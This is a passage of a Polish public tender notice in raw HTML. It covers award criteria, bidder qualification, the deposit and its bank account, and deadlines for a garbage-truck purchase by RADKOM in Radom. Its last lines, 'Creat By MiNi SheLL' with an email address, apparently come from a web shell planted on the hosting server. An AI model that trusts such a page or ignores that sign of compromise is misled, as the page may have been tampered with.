class="mb-0">4.3.6.) Waga: <span class="normal">6,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni w/w warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie dostawę co najmniej jednej nowej śmieciarki jednokomorowej - wykaz stanowi Załącznik nr 8 do SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający żąda następujących dokumentów, składanych przez wykonawcę w postępowaniu na wezwanie Zamawiającego w celu potwierdzenia okoliczności, o których mowa w art. 273 ust. 1 pkt. 1) ustawy Pzp:<br/>1) Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków <br/>o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>2) Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt. 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej stanowi Załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.4.	W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej określonego w pkt 5.3.4. SWZ zamawiający żąda od wykonawcy dokumentów w celu potwierdzenia okoliczności, o których mowa w art. 273 ust. 1 pkt. 2) ustawy Pzp.<br/> Wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - wzór wykazu stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie zgodności z wymaganiami opisanymi w SWZ Wykonawca zobowiązany jest ZŁOŻYĆ WRAZ z OFERTĄ (zgodnie z art. 107 ust. 1 ustawy Pzp) specyfikację techniczna oferowanego pojazdu – wzór stanowi załącznik nr 2 do SWZ (zgodnie z art. 106 ust. 1 ustawy Pzp). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe służą potwierdzeniu zgodności z wymaganiami Zamawiającego opisanymi w opisie przedmiotu zamówienia (pkt 3 SWZ) i będą podlegały uzupełnieniu zgodnie z art. 107 ust. 2 ustawy Pzp.<br/><br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą, lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie Wykonawcę do ich uzupełnienia, natomiast jeśli przedmiotowe środki dowodowe będą niezgodnie z wymaganiami Zamawiającego, będą zawierały błędy itp. Wykonawca nie zostanie wezwany do ich uzupełnienia - oferta wykonawcy zostanie odrzucona na podstawie art. 226 pkt. 1 ust. 5) ustawy Pzp. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Przed podpisaniem umowy Wykonawca, którego ofertę wybrano jako najkorzystniejszą zobowiązany będzie przedłożyć:<br/>a) pełnomocnictwo, jeżeli umowę podpisuje pełnomocnik,<br/>b) umowę regulującą współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta tych wykonawców zostanie wybrana,<br/>c) dokument ubezpieczenia OC w zakresie prowadzenia działalności związanej z przedmiotem umowy na kwotę nie mniejszą niż 500 000 zł.<br/>d) zabezpieczenie należytego wykonania umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w kwocie: 10 000,00 zł<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wnoszone w jednej lub w kilku następujących formach, o których mowa w art. 97 ust. 7 ustawy Pzp:<br/>a)	pieniądzu,<br/>b)	gwarancjach bankowych,<br/>c)	gwarancjach ubezpieczeniowych,<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. 2023 poz. 462).<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>PPUH „RADKOM” Sp. z o. o.<br/>Bank Pekao SA II O/Radom 63 1240 3259 1111 0000 2989 7544 <br/>z adnotacją „Wadium - Dostawa fabrycznie nowego samochodu ciężarowego z zabudową śmieciarki jednokomorowej na podwoziu trzyosiowym, znak sprawy 12/2024”<br/>5. Za skuteczne wniesienie wadium w pieniądzu , zamawiający uzna wadium , które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego ww. rachunek.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 10.3 lit. b), c), d) należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>7. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej lub poręczenia, gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji / poręczenia <br/> (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b) kwotę wadium<br/>c) termin ważności gwarancji /poręczenia <br/>d) zobowiązanie gwaranta / poręczyciela do zapłacenia kwoty wskazanej w gwarancji / poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy <br/>8. Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust 6 ustawy Pzp.<br/>Wadium wniesione przez jednego z członków konsorcjum w imieniu całego konsorcjum uważa się za wniesione prawidłowo.<br/>10. W przypadku gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98ust 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust.1 pkt. 14 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.<br/>5. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego na podstawie zasad określonych w pkt 12.14 - 12.16 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca przygotowuje ofertę przez Platformę e-Zamówienia: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga przed zawarciem Umowy wniesienia zabezpieczenia należytego wykonania Umowy w wysokości stanowiącej równowartość 5 % wartości brutto podanej w ofercie w formach określonych w przepisach Ustawy Pzp. <br/><br/>2. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w:<br/>art. 108 ust. 1 Pzp, art. 109 ust 1 pkt 1, 4 ustawy Pzp, art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t. j. Dz. U. 2023 poz. 1497).

Creat By MiNi SheLL
Email: jattceo@gmail.com